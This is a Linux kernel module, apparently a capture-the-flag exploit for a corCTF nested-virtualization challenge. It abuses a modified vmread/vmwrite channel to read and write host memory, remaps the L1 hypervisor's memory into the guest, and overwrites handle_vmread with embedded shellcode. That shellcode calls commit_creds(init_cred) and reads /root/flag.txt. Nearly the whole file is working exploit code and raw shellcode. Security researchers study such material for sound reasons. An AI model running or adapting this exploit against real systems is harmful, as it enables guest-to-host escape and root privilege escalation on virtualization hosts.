#include <linux/init.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/sched.h>
#include <linux/kprobes.h>
#include <linux/version.h>
#include <linux/efi.h>

#include <asm/uaccess.h>
#include <asm/fsgsbase.h>
#include <asm/io.h>
#include <linux/uaccess.h>

static ssize_t proc_read(struct file* filep, char* __user buffer, size_t len, loff_t* offset);
static ssize_t proc_write(struct file* filep, const char* __user u_buffer, size_t len, loff_t* offset);
static int proc_open(struct inode *inode, struct file *filep);


#if LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0)

static struct proc_ops fops = {
    .proc_open = proc_open,
    .proc_read = proc_read,
    .proc_write = proc_write,
};

#else

static struct file_operations fops = {
    .owner = THIS_MODULE,
    .open = proc_open,
    .read = proc_read,
    .write = proc_write,
};

#endif

const char kvm_dat[] = "\x0f\x78\xc6\x3e";

/*
    push rax
    push rbx
    push rcx
    push rdx
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push rdi
    push rsi

    // get kaslr base
    mov rax, 0xfffffe0000000004
    mov rax, [rax]
    sub rax, 0x1008e00

    // r12 is kaslr_base
    mov r12, rax

    // commit_creds
    mov r13, r12
    add r13, 0xbdad0

    // init_cred
    mov r14, r12
    add r14, 0x1a52ca0

    mov rdi, r14
    call r13

    // filp_open
    mov r11, r12
    add r11, 0x292420

    // push /root/flag.txt
    mov rax, 0x7478742e6761
    push rax
    mov rax, 0x6c662f746f6f722f
    push rax
    mov rdi, rsp

    // O_RDONLY
    mov rsi, 0

    call r11

    // r10 is filp_ptr
    mov r10, rax

    // kernel_read
    mov r11, r12
    add r11, 0x294c70

    // writeable kernel address
    mov r9, r12
    add r9, 0x18ab000

    mov rdi, r10
    mov rsi, r9
    mov rdx, 0x100
    mov rcx, 0

    call r11

    pop rax
    pop rax

    pop rsi
    pop rdi
    pop r13
    pop r14
    pop r12
    pop r11
    pop r10
    pop r9
    pop rdx
    pop rcx
    pop rbx
    pop rax
*/

const uint8_t shellcode[] = "\x50\x53\x51\x52\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x57\x56\x48\xb8\x04\x00\x00\x00\x00\xfe\xff\xff\x48\x8b\x00\x48\x2d\x00\x8e\x00\x01\x49\x89\xc4\x4d\x89\xe5\x49\x81\xc5\xd0\xda\x0b\x00\x4d\x89\xe6\x49\x81\xc6\xa0\x2c\xa5\x01\x4c\x89\xf7\x41\xff\xd5\x4d\x89\xe3\x49\x81\xc3\x20\x24\x29\x00\x48\xb8\x61\x67\x2e\x74\x78\x74\x00\x00\x50\x48\xb8\x2f\x72\x6f\x6f\x74\x2f\x66\x6c\x50\x48\x89\xe7\x48\xc7\xc6\x00\x00\x00\x00\x41\xff\xd3\x49\x89\xc2\x4d\x89\xe3\x49\x81\xc3\x70\x4c\x29\x00\x4d\x89\xe1\x49\x81\xc1\x00\xb0\x8a\x01\x4c\x89\xd7\x4c\x89\xce\x48\xc7\xc2\x00\x01\x00\x00\x48\xc7\xc1\x00\x00\x00\x00\x41\xff\xd3\x58\x58\x5e\x5f\x41\x5d\x41\x5e\x41\x5c\x41\x5b\x41\x5a\x41\x59\x5a\x59\x5b\x58";

uint64_t vmxon_page_pa, vmptrld_page_pa;

static __always_inline unsigned long long native_get_debugreg(int regno)
{
    unsigned long val = 0;    /* Damn you, gcc! */

    switch (regno) {
    case 0:
        asm("mov %%db0, %0" :"=r" (val));
        break;
    case 1:
        asm("mov %%db1, %0" :"=r" (val));
        break;
    case 2:
        asm("mov %%db2, %0" :"=r" (val));
        break;
    case 3:
        asm("mov %%db3, %0" :"=r" (val));
        break;
    case 6:
        asm("mov %%db6, %0" :"=r" (val));
        break;
    case 7:
        asm("mov %%db7, %0" :"=r" (val));
        break;
    default:
        BUG();
    }
    return val;
}

static __always_inline void native_set_debugreg(int regno, unsigned long value)
{
    switch (regno) {
    case 0:
        asm("mov %0, %%db0"    ::"r" (value));
        break;
    case 1:
        asm("mov %0, %%db1"    ::"r" (value));
        break;
    case 2:
        asm("mov %0, %%db2"    ::"r" (value));
        break;
    case 3:
        asm("mov %0, %%db3"    ::"r" (value));
        break;
    case 6:
        asm("mov %0, %%db6"    ::"r" (value));
        break;
    case 7:
        asm("mov %0, %%db7"    ::"r" (value));
        break;
    default:
        BUG();
    }
}

static noinline uint64_t read_cr3(void) {
    uint64_t val = 0;
        asm("mov %%cr3, %0" :"=r" (val));
    return val;
}

static noinline uint64_t read_guy(unsigned long offset) {
    uint64_t val = 0;

    uint64_t vmread_field = 0;
    uint64_t vmread_value = 0;

    native_set_debugreg(0, 0x1337babe);
    native_set_debugreg(1, offset);
    asm volatile( "vmread %[field], %[output]\n\t"
              : [output] "=r" (vmread_value)
              : [field] "r" (vmread_field) : );
    val = native_get_debugreg(2);

    return val;
}

static noinline void write_guy(unsigned long offset, unsigned long value) {
    uint64_t vmwrite_field = 0;
    uint64_t vmwrite_value = 0;

    native_set_debugreg(0, 0x1337babe);
    native_set_debugreg(1, offset);
    native_set_debugreg(2, value);
    asm volatile( "vmwrite %[value], %[field]\n\t"
          :
          : [field] "r" (vmwrite_field),
            [value] "r" (vmwrite_value) : );
}

#define IDT_BASE 0xfffffe0000000000ull

static noinline int find_l1_vmcs(uint64_t *l1_vmcs_offset) {
    unsigned long long pos_offset = 0, neg_offset = 0;
    uint64_t zero_val = 0, pos_val = 0, neg_val = 0;
    uint64_t found_val = 0, found_offset = 0;
    uint64_t i = 0;

    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);

    // scan in each direction looking for the guest_idtr_base field of the l1 vm
    for (i = 0; i < 0x4000; i++) {
        // from attaching to the l1 guest, the address of guest_idtr_base always has 0x208 in the lower 3 nibbles
        pos_offset = ((i * 0x1000) + 0x208) / 8;
        neg_offset = ((i * -1 * 0x1000) + 0x208) / 8;

        pos_val = read_guy(pos_offset);
        if (pos_val == IDT_BASE) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

        neg_val = read_guy(neg_offset);
        if (neg_val == IDT_BASE) {
            found_val = neg_val;
            found_offset = neg_offset;
            break;
        }

        if (i < 0x20) {
            pr_info("vmcs12[%llx * 8] = %llx\n", pos_offset, pos_val);
            pr_info("vmcs12[%llx * 8] = %llx\n", neg_offset, neg_val);
        }
    }
    if (found_val == 0) {
        pr_info("[exp]: IDT NOT FOUND :(\n");
        *l1_vmcs_offset = 0;
        return 0;
    } else {
        pr_info("[exp]: Found IDT in l1 at offset %lld; value: %llx\n", found_offset, found_val);
        *l1_vmcs_offset = found_offset;
        return 1;
    }
}

static noinline int find_nested_vmx(uint64_t *nested_vmx_offset) {
    // the nested_vmx struct contains two known values --
    //     the guest phys addrs of the vmxon_ptr and current_vmptr
    // finding this structure allows us to read the `cached_vmcs12` pointer
    // which is the host virtual address of our vmcs, based on that we can
    // figure out where we are at in the l1's virtual address space

    unsigned long long pos_offset = 0, neg_offset = 0;
    uint64_t zero_val = 0, pos_val = 0, neg_val = 0;
    uint64_t found_val = 0, found_offset = 0;
    uint64_t i = 0;

    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);
    zero_val = read_guy(1ull);
    pr_info("vmcs12[1] = %llx\n", zero_val);
    zero_val = read_guy(0ull);
    pr_info("vmcs12[0] = %llx\n", zero_val);

    for (i = 1; i < (0x4000*0x200); i += 2) {
        pos_offset = i;
        neg_offset = -i;
        // seen: 0xe8 0x28 0x68

        pos_val = read_guy(pos_offset);
        if (pos_val == vmptrld_page_pa && read_guy(pos_offset-2) == vmxon_page_pa) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

        // in practice negative offset is rare/impossible?
        // commented out bc it keeps going too far and crashing
        //neg_val = read_guy(neg_offset);
        //if (neg_val == vmptrld_page_pa && read_guy(neg_offset-2) == vmxon_page_pa) {
        //    found_val = neg_val;
        //    found_offset = neg_offset;
        //    break;
        //}

        if (i > 0x1000 && i < 0x2000) {
            pr_info("vmcs12[%llx * 8] = %llx\n", pos_offset, pos_val);
            //pr_info("vmcs12[%llx * 8] = %llx\n", neg_offset, neg_val);
        }
    }
    if (found_val == 0) {
        pr_info("[exp]: L1 VMCS NOT FOUND :(\n");
        *nested_vmx_offset = 0;
        return 0;
    } else {
        pr_info("[exp]: Found vmcs in l1 at offset %lld; value: %llx\n", found_offset, found_val);
        *nested_vmx_offset = found_offset;
        return 1;
    }
}

static int proc_open(struct inode *inode, struct file *filep) {
    uint64_t l1_vmcs_offset = 0;
    uint64_t nested_vmx_offset = 0;
    uint64_t l2_vmcs_addr = 0;

    uint64_t eptp_value = 0;
    uint64_t ept_offset = 0;
    uint64_t ept_addr = 0;

    uint64_t pml4e_value = 0;
    uint64_t pml4e_offset = 0;
    uint64_t pml4e_addr = 0;

    uint64_t *pgde_page = 0;
    uint64_t pgde_page_pa = 0;

    uint64_t l2_entry = 0;

    uint64_t physbase = 0;
    uint64_t cr3 = 0;
    uint64_t *pgd = 0;

    uint64_t handle_vmread_page = 0;
    uint8_t *handle_vmread = 0;

    uint64_t i;

    if (!find_l1_vmcs(&l1_vmcs_offset)) {
        return 0; // not found
    }

    if (!find_nested_vmx(&nested_vmx_offset)) {
        return 0; // not found
    }

    l2_vmcs_addr = read_guy(nested_vmx_offset+1);
    pr_info("[exp]: YOU ARE HERE: %llx\n", l2_vmcs_addr);

    physbase = l2_vmcs_addr & ~0xfffffffull;
    pr_info("[exp]: probably physbase: %llx\n", l2_vmcs_addr & ~0xfffffff);

    eptp_value = read_guy(l1_vmcs_offset-50);
    pr_info("[exp]: eptp_value: %llx\n", eptp_value);

    ept_addr = physbase + (eptp_value & ~0xfffull);
    pr_info("[exp]: ept_addr: %llx\n", ept_addr);

    ept_offset = (ept_addr-l2_vmcs_addr) / 8;
    pr_info("[exp]: ept_offset: %llx\n", ept_offset);

    // read first entry in ept to get the PML4E
    pml4e_value = read_guy(ept_offset);
    pr_info("[exp]: pml4e_value: %llx\n", pml4e_value);

    pml4e_addr = physbase + (pml4e_value & ~0xfffull);
    pr_info("[exp]: pml4e_addr: %llx\n", pml4e_addr);

    pml4e_offset = (pml4e_addr-l2_vmcs_addr) / 8;
    pr_info("[exp]: pml4e_offset: %llx\n", pml4e_offset);

    // at 6GB will be an identity mapping of the l1 memory in l2
    write_guy(pml4e_offset + 6, 0x987);

    cr3 = read_cr3();
    pgd = (cr3 & ~0xfffull) + page_offset_base;
    pr_info("[exp]: pgd: %llx\n", pgd);

    pgde_page = kzalloc(0x1000, GFP_KERNEL);
    pgde_page_pa = virt_to_phys(pgde_page);

    // sticking the l1 mapping at the PGD entry the LDT remap usually goes at cuz why not
    pgd[272] = pgde_page_pa | 0x7;

    // huge and rwxp
    l2_entry = 0x180000000 | (1<<7) | 0x3;

    pgde_page[0] = l2_entry;

    // in THEORY I can access memory at 0xffff880000000000 now
    pr_info("TEST: %llx\n", *((uint64_t *)0xffff880000000000));

    // look for 0x3ec6780f to find the page where handle_vmread is at
    for (i = 0; i < (1024ull << 20); i += 0x1000) {
        unsigned int val = *((unsigned int *)(0xffff880000000df8 + i));

        // check the value and check if relocations were applied
        if (val == 0x3ec6780f && *((unsigned int *)(0xffff880000000df8 + 0xb + i)) != 0) {
            handle_vmread_page = 0xffff880000000000 + i;
            break;
        }
    }

    pr_info("found handle_vmread page at: %llx\n", handle_vmread_page);

    handle_vmread = handle_vmread_page + 0x4d0;
    pr_info("handle_vmread at: %llx\n", handle_vmread);

    // I don't want to figure out the address of nested_vmx_succeeded so pad with nops just up to that call
    // and make the instruction just after nested_vmx_succeeded returns be ret
    memset(handle_vmread, 0x90, 0x281);
    handle_vmread[0x286] = 0xc3;

    // -1 to remove null terminator
    memcpy(handle_vmread, shellcode, sizeof(shellcode)-1);

    // do it
    read_guy(0);

    // scan for flag in memory
    for (i = 0; i < 1024ull << 20; i+= 0x1000) {
        if (!memcmp(0xffff880000000000 + i, "corctf{", 7)) {
            pr_info("flag: %s\n", 0xffff880000000000 + i);
            break;
        }
    }

    return 0;
}

static ssize_t proc_read(struct file* filep, char* __user buffer, size_t len, loff_t* offset) {
    return 0;
}

static ssize_t proc_write(struct file* filep, const char* __user u_buffer, size_t len, loff_t* offset) {
    return 0;
}

void __no_profile native_write_cr4(unsigned long val)
{
        unsigned long bits_changed = 0;
        asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");
}

static inline int vmxon(uint64_t phys)
{
        uint8_t ret;

        __asm__ __volatile__ ("vmxon %[pa]; setna %[ret]"
                : [ret]"=rm"(ret)
                : [pa]"m"(phys)
                : "cc", "memory");

        return ret;
}

static inline int vmptrld(uint64_t vmcs_pa)
{
        uint8_t ret;

        __asm__ __volatile__ ("vmptrld %[pa]; setna %[ret]"
                : [ret]"=rm"(ret)
                : [pa]"m"(vmcs_pa)
                : "cc", "memory");

        return ret;
}


static inline uint64_t rdmsr_guy(uint32_t msr)
{
    uint32_t a, d;

    __asm__ __volatile__("rdmsr" : "=a"(a), "=d"(d) : "c"(msr) : "memory");

    return a | ((uint64_t) d << 32);
}


static inline uint32_t vmcs_revision(void)
{
    return rdmsr_guy(MSR_IA32_VMX_BASIC);
}

static int __init proc_init(void)
{
    void *vmxon_page, *vmptrld_page;
    struct proc_dir_entry *new;
    unsigned long cr4;
    int res;

    cr4 = native_read_cr4();
    cr4 |= 1ul << 13;
    native_write_cr4(cr4);

    pr_info("[exp]: set cr4 to %lx", cr4);
    vmxon_page = kzalloc(0x1000, GFP_KERNEL);
    vmptrld_page = kzalloc(0x1000, GFP_KERNEL);

    vmxon_page_pa = virt_to_phys(vmxon_page);
    vmptrld_page_pa = virt_to_phys(vmptrld_page);

    *(uint32_t *)(vmxon_page) = vmcs_revision();
    *(uint32_t *)(vmptrld_page) = vmcs_revision();

    res = vmxon(vmxon_page_pa);
    pr_info("[exp]: vmxon returned %d", res);

    res = vmptrld(vmptrld_page_pa);
    pr_info("[exp]: vmptrld returned %d", res);

    pr_info("[exp]: vmxon_pa %llx", vmxon_page_pa);
    pr_info("[exp]: vmptrld_pa %llx", vmptrld_page_pa);

    pr_info("page_offset_base: %lx\n", page_offset_base);

    new = proc_create("exp", 0777, NULL, &fops);
    pr_info("[exp]: init\n");
    return 0;
}

static void __exit proc_exit(void)
{
    remove_proc_entry("exp", NULL);
    pr_info("exp: exit\n");
}

module_init(proc_init);
module_exit(proc_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("zolutal");
MODULE_DESCRIPTION("bleh");
MODULE_VERSION("0.1");
